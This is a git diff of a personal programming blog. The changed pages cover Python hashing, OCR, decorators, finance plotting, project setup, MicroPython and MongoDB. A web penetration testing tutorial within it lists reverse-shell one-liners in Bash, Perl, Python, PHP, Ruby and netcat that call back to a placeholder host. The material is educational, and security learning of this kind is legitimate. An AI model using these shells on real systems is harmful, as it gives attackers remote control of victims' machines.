    from passlib.hash import argon2
    +
    1
    from passlib.hash import argon2
     

    Following importing the hashing algorithm, to hash the password in our case is very simple and we can have a peak at what the output hash looks like:

    -
    1
    +
    1
     2
     3
    hash = argon2.hash("super_secret_password")
     
    @@ -247,7 +247,7 @@ 

    Using hashes with Python

  • \$mvLTquN71JPjuC+S9QNXYA - the base64-encoded hashed password (derived key), using standard base64 encoding and no padding.
  • If we run this again, we can check that the outputs are completely different due to the randomly generated salt.

    -
    1
    +
    1
     2
     3
    hash = argon2.hash("super_secret_password")
     
    @@ -259,14 +259,14 @@ 

    Using hashes with Python

    Now that we've generated our new passwords, stored them away in a secure database somewhere, using a secure method of communication somehow, our user wants to login with the password they signed up with ("super_secret_password") and we have to check if this is the correct password.

    To do this with passlib, it is as simply as calling the .verify function with the plaintext and the equivalent hash which will return a boolean value determining whether of not the password is correct or not.

    -
    1
    print(argon2.verify("super_secret_password",hash))
    +
    1
    print(argon2.verify("super_secret_password",hash))
     

    True

    Hooray! Our password verification system works, now we would like to check that if the user inputs a incorrect password that our algorithm returns correctly (false).

    -
    1
    print(argon2.verify("user_name",hash))
    +
    1
    print(argon2.verify("user_name",hash))
     
    diff --git a/python-and-ocr.html b/python-and-ocr.html index 30673cf6..16403eef 100644 --- a/python-and-ocr.html +++ b/python-and-ocr.html @@ -163,7 +163,7 @@

    Python and OCR

    Now we are finally ready to test the engine and see if we can extract text out of an image, first of all we will start with a 'well' written example, the 'logo' of this website!

    test_image

    Of course, we have still yet to write any code, so naturally, that is the next step. As always in a python project, you will need to import all the dependencies of the project, in this case, it will be Image from the PIL (pillow) package, and pytesseract (the python wrapper around the Tesseract Engine).

    -
    1
    +
    1
     2
    from PIL import Image
     import pytesseract
     
    @@ -174,7 +174,7 @@

    Python and OCR

  • PyTesseract.
  • Luckily for us, the developers have made this so simple it could be a one liner:

    -
    1
    print(pytesseract.image_to_string(Image.open('images/example.png')))
    +
    1
    print(pytesseract.image_to_string(Image.open('images/example.png')))
     

    Which outputs in the console from the example image above:

    @@ -186,7 +186,7 @@

    Python and OCR

    Great! We can confirm that the text that the tesseract engine detected, is in fact, exactly what the example we gave it was.

    However, let's go a bit out of the way to make this a function such that it can be called more easily with the filepath to the image as a string.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/python-decorators-explained.html b/python-decorators-explained.html
    index 880995ec..048571f9 100644
    --- a/python-decorators-explained.html
    +++ b/python-decorators-explained.html
    @@ -159,7 +159,7 @@ 

    Python Decorators Explained

    Python decorators are one of the most difficult concepts in Python to grasp, and subsequently a lot of beginners struggle. However they help to shorten code and make it more 'Pythonic'. This post is going to go through some basic examples where decorators can shorten your code.

    Firstly you have to understand functions within python:

    -
     1
    +
     1
      2
      3
      4
    @@ -198,7 +198,7 @@ 

    Python Decorators Explained

    As we can see above we can give functions default arguments (the string 'Jack' for the name variable in hello). Assign functions to variables (ensuring the parentheses are not included otherwise we would be assigning to the returning value from the function. Remove previous functions now that we have 'copied' the function over.

    Now to take the next step into functions within Python, by defining functions within functions:

    -
     1
    +
     1
      2
      3
      4
    @@ -234,7 +234,7 @@ 

    Python Decorators Explained

    Now we can make nested functions (functions within functions), the next step is, functions returning functions.

    -
     1
    +
     1
      2
      3
      4
    @@ -272,7 +272,7 @@ 

    Python Decorators Explained

    From earlier, we know that if we don't include the parentheses then the function does not executed. Another extension of the way this is formatted is that we can now call hello()() which outputs "Now you are in the greeting() function".

    -
     1
    +
     1
      2
      3
      4
    @@ -294,7 +294,7 @@ 

    Python Decorators Explained

    Now you have all the knowledge to learn what decorators really are, they let you execute code before and after a function. The code above is actually a decorator, but let's make it more usable.

    -
     1
    +
     1
      2
      3
      4
    @@ -336,7 +336,7 @@ 

    Python Decorators Explained

    Now you've made a decorator! We've just used what we learned previously to modify it's behaviour in one way or another. Now to make it even more concise we can just the @ symbol. Here is how we could have used the previous code with @ symbol.

    -
     1
    +
     1
      2
      3
      4
    diff --git a/python-for-the-finance-industry.html b/python-for-the-finance-industry.html
    index 86e628af..7ac81520 100644
    --- a/python-for-the-finance-industry.html
    +++ b/python-for-the-finance-industry.html
    @@ -176,7 +176,7 @@ 

    Python for the Finance Industry

    To import these libraries into our Python code the following\ code is required:

    -
    1
    +
    1
     2
     3
     4
    import pandas as pd
    @@ -189,7 +189,7 @@ 

    Python for the Finance Industry

    process and display the data. The first step is to extract the data in a useful\ format from the Alpha Vantage API.

    First declare a list with all the companies ASX names with the suffix “.AX” to denominate that it’s from the ASX. After that initialise an empty pandas dataframe to be filled with the data to analyse. Now iterate over the list, calling a request through the API to request the data that is required. There are multiple formats of data to be extracted through the API which is detailed in the Alpha_Vantage documentation. For this post, I have used the get_daily function from the timeseries object in alpha_vantage to extract the daily information on a stock for the past 20 years, in particular, the closing value.

    -
     1
    +
     1
      2
      3
      4
    @@ -212,7 +212,7 @@ 

    Python for the Finance Industry

    stocks_listing

    Now that the dataframe is full of closing values for the companie’s stock’s closing values, it’s time to begin processing. First of all, for any missing data or erroneous 0 values, the ffill() function is used to fill any missing value by propagating the last valid observation forward. After that, the timestamp on each row is forced to become the index of the dataframe and converted to a datetime type.

    -
    1
    +
    1
     2
     3
    stocks_df = stocks_df.replace(0,pd.np.nan).ffill()
     stocks_df.index = pd.to_datetime(stocks_df["date"])
    @@ -220,7 +220,7 @@ 

    Python for the Finance Industry

    Now that the data has gone through it’s pre-processing phase, it’s time to begin plotting some figures. To begin, a basic figure, plotting a single for each company’s stock price over the past 20 years on a single line graph to enable comparison between the companies.

    -
    1
    +
    1
     2
     3
     4
    @@ -235,7 +235,7 @@ 

    Python for the Finance Industry

    line_graph Another way to plot this data is to show it as the percentage change from the day before AKA daily returns. By plotting the data in this way, instead of showing the actual prices, the graph is showing the stocks’ volatility.

    -
    1
    +
    1
     2
     3
     4
    diff --git a/python-project-workflow.html b/python-project-workflow.html
    index f1bc3637..4605a6cf 100644
    --- a/python-project-workflow.html
    +++ b/python-project-workflow.html
    @@ -162,7 +162,7 @@ 

    Python Project Workflow

    Now once these are installed (if you put them in the default location), Python will default to be located in: C:\Users\Jack\AppData\Local\Programs\Python\Python37-32. For the next few steps to ensure we are setting up virtual environments for our projects open command prompt here if you are on windows. This will look something like this:

    image-11.png

    The 'cd' command in windows (and other OS) stands for change directory, follow this with a path and you will be brought to that directory. Next whenever I first install Python I like to update pip to it's latest release, to do this use the command in this window:

    -
    1
    python -m pip install --upgrade pip
    +
    1
    python -m pip install --upgrade pip
     

    With pip upgraded to it's current release, it's time to install some very helpful packages for setting up projects: virtualenv and cookiecutter. To install these navigate to the the Scripts folder within the current directory with cd ('cd Scripts') and run 'pip.exe install virtualenv cookiecutter', pip will then work it's magic and install these packages for you.

    @@ -178,24 +178,24 @@

    Python Project Workflow

    If you chose to do this step, you will now be able to create virtual environments and cookiecutter templates without having to specify the directory to the executables.

    It's now time to create a project from scratch. So navigate to where you like to keep your projects (mostly mine is in Documents\Github\) but you can put them anywhere you like. Now run command prompt again (or keep the one you have open) and navigate to the dedicated folder (or folders) using cd.

    For most of my projects lately being of data science in nature, I like to use the cookiecutter-data-science template which you can find all the information about here: https://drivendata.github.io/cookiecutter-data-science/. To then create a project it is as simple as running:

    -
    1
    cookiecutter https://github.com/drivendata/cookiecutter-data-science
    +
    1
    cookiecutter https://github.com/drivendata/cookiecutter-data-science
     

    image-3.png

    Provide as much information as you wish into the questions and you will now have a folder created wherever you ran the command with all the relevant sections from the template.

    Whenever starting a new Python project, my personal preference is to keep the virtual environment within the directory, however this is not always a normal practice. To create a virtual environment for our Python packages, navigate into the project and run (if you added Scripts to your Path):

    -
    1
    virtualenv env
    +
    1
    virtualenv env
     

    This will then initialise a folder within your current directory to install a copy of Python and all it's relevant tools with a folder ('env').

    Before we go any further, this is the point that I like to initialise a git repository. To do this, run git init from your command line from within the project directory.

    Now to finish off the final steps of the workflow that will affect the day-to-day development, I like to use pre-commit hooks to reformat my with black and on some projects check for PEP conformance with flake8 on every commit to my projects repository. This is purely a personal preference on how you would like to work, others like to use pytest and more to ensure their projects are working as intended, however I am not at that stage just yet.

    To install these pre-commits into our workflow, firstly initialise the virtual environment from within our project by navigating to env/Scripts/activate.bat. This will activate your project's Python package management system and runtime, following this you can install packages from pip and otherwise. For our pre-commits we install the package 'pre-commit':

    -
    1
    pip install pre-commit
    +
    1
    pip install pre-commit
     

    Following this to set up the commit hooks create a '.pre-commit-config.yaml' within your main project directory. This is where we will specify what hooks we would like to run before being able to commit. Below is a sample .pre-commit-config.yaml that I use in my projects:

    -
     1
    +
     1
      2
      3
      4
    @@ -226,7 +226,7 @@ 

    Python Project Workflow

    On the default cookiecutter data science template with the settings as per above this will show on the pre-commit run (after you have staged changes in git (use git add -A for all)):

    image-4.png

    We can see a different opinions in code formatting appearing already from flake8's output. The black code formatter in Python's code length is 88 characters , not 79 like PEP8. So we will add a pyproject.toml to the project directory where we can specify settings within the black tool:

    -
     1
    +
     1
      2
      3
      4
    @@ -262,7 +262,7 @@ 

    Python Project Workflow

    For any flake8 specific settings (such as error codes to ignore), we can set a .flake8 file in the project directory as well, which may look like:

    -
    1
    +
    1
     2
     3
     4
    diff --git a/sitemap.xml b/sitemap.xml
    index 561c8c9e..e63155ca 100644
    --- a/sitemap.xml
    +++ b/sitemap.xml
    @@ -5,28 +5,28 @@ xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
     
     
     https://jackmckew.dev/
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/archives.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/tags.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
     
     
     https://jackmckew.dev/categories.html
    -2024-08-08T04:20:47-00:00
    +2024-08-08T04:21:55-00:00
     daily
     0.6
     
    diff --git a/tag/python4.html b/tag/python4.html
    index 4f66b9fd..b96857d9 100644
    --- a/tag/python4.html
    +++ b/tag/python4.html
    @@ -153,7 +153,7 @@ 

    Document code automatically through docstrings with Sphinx

    This post goes into how to generate documentation for your python projects automatically with Sphinx!

    First off we have to install sphinx into our virtual environment. Pending on your flavour, we can do any of the following

    -
    1
    +
    1
     2
     3
    pip install sphinx …

    diff --git a/web-penetration-testing-with-kali-linux.html b/web-penetration-testing-with-kali-linux.html index 7922dad7..986755da 100644 --- a/web-penetration-testing-with-kali-linux.html +++ b/web-penetration-testing-with-kali-linux.html @@ -273,27 +273,27 @@

    Exploiting Code Execution Vul

    Following this are a list of commands that you could execute to get a reverse connection for different supported languages. Where the variable to change denoted by [HOST_IP] and optionally to change the port. Note that these are all 'one-liners' so they could be executed in input boxes.

    Bash

    -
    1
    bash -i >& /dev/tcp/[HOST_IP]/8080 0>&1
    +
    1
    bash -i >& /dev/tcp/[HOST_IP]/8080 0>&1
     

    PERL

    -
    1
    perl -e 'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
    +
    1
    perl -e 'use Socket;$i="[HOST_IP]";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
     

    Python

    -
    1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
    +
    1
    python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[HOST_IP]",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
     

    PHP

    -
    1
    php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
    +
    1
    php -r '$sock=fsockopen("[HOST_IP]",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
     

    Ruby

    -
    1
    ruby -rsocket -e'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
    +
    1
    ruby -rsocket -e'f=TCPSocket.open("[HOST_IP]",8080).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
     

    Netcat

    -
    1
    nc -e /bin/sh [HOST_IP] 8080
    +
    1
    nc -e /bin/sh [HOST_IP] 8080
     

    Local File Inclusion

    @@ -303,7 +303,7 @@

    Remote File Inclusion

    1. create a php file with the following:
    -
    1
    +
    1
     2
     3
     4
    diff --git a/what-is-micropython.html b/what-is-micropython.html
    index 24aff571..440121fe 100644
    --- a/what-is-micropython.html
    +++ b/what-is-micropython.html
    @@ -164,7 +164,7 @@ 

    What is MicroPython?

    Differences between MicroPython & Python

    There obviously had to be some changes between Python and MicroPython to make it work efficiently on processors a fraction of the power, but what are they? If you are a beginner-intermediate Python programmer, you’ll only run into trouble in very specific scenarios, which can be easily worked around. For example you cannot delete from a list with a step greater than 1.

    Sample Python Code

    -
    1
    +
    1
     2
     3
    L = [1,2,3,4]
     del(L[0:4:2])
    @@ -188,7 +188,7 @@ 

    Sample Python Code

    However this can be easily worked around with an explicit loop for example:

    Sample MicroPython/Python Code

    -
    1
    +
    1
     2
     3
     4
    L = [1,2,3,4]
    diff --git a/what-is-mongodb.html b/what-is-mongodb.html
    index bb3169b0..3ebcf1c4 100644
    --- a/what-is-mongodb.html
    +++ b/what-is-mongodb.html
    @@ -170,14 +170,14 @@ 

    What is MongoDB?

    MongoDB is a open source document-oriented database program, classified as a NoSQL database and utilizes JSON-like documents with a schema. They also provide a tool to help sift through the database called 'Compass'.

    Personally, I really enjoy the functionality within Compass with plotting geographical data, presenting data type variances across the fields in a document and many other features. I found Compass one of the most appealing features as someone that constantly seeks to gain insight from data.

    Queries within MongoDB are structured like a dictionary in Python, where the field in the document is passed the key and the criteria is the value. For example, a basic query to return all documents within a MongoDB database with score equal to 7 would be:

    -
    1
    {score:7}
    +
    1
    {score:7}
     

    As a mainly Python developer, I found this to be very appealing as I find myself using dictionaries constantly when writing Python code, and by MongoDB using this format makes for an easy connection between the two.

    CRUD operations, are the fundamentals on actually using a database usefully. Through the Mongo shell you are able to add documents to the MongoDB database through JSON, XML, etc data formats.

    Projections within MongoDB are used to specify or restrict the fields to return with the filtered documents if you are specifically looking at a few fields within a densely populated document.

    In addition to the way queries are structured for filtering documents, it is also possible to use one of the many query or projection operators to further filter the documents. For example a query to return all documents with a score greater than 7 would be:

    -
    1
    {score: {$gte: 7}}
    +
    1
    {score: {$gte: 7}}
     

    This sums up all of the takeaways from the M001 course for MongoDB that I found. I look forward to taking more of the courses on MongoDB university to gain a greater understanding and be able to utilise MongoDB across some of my projects.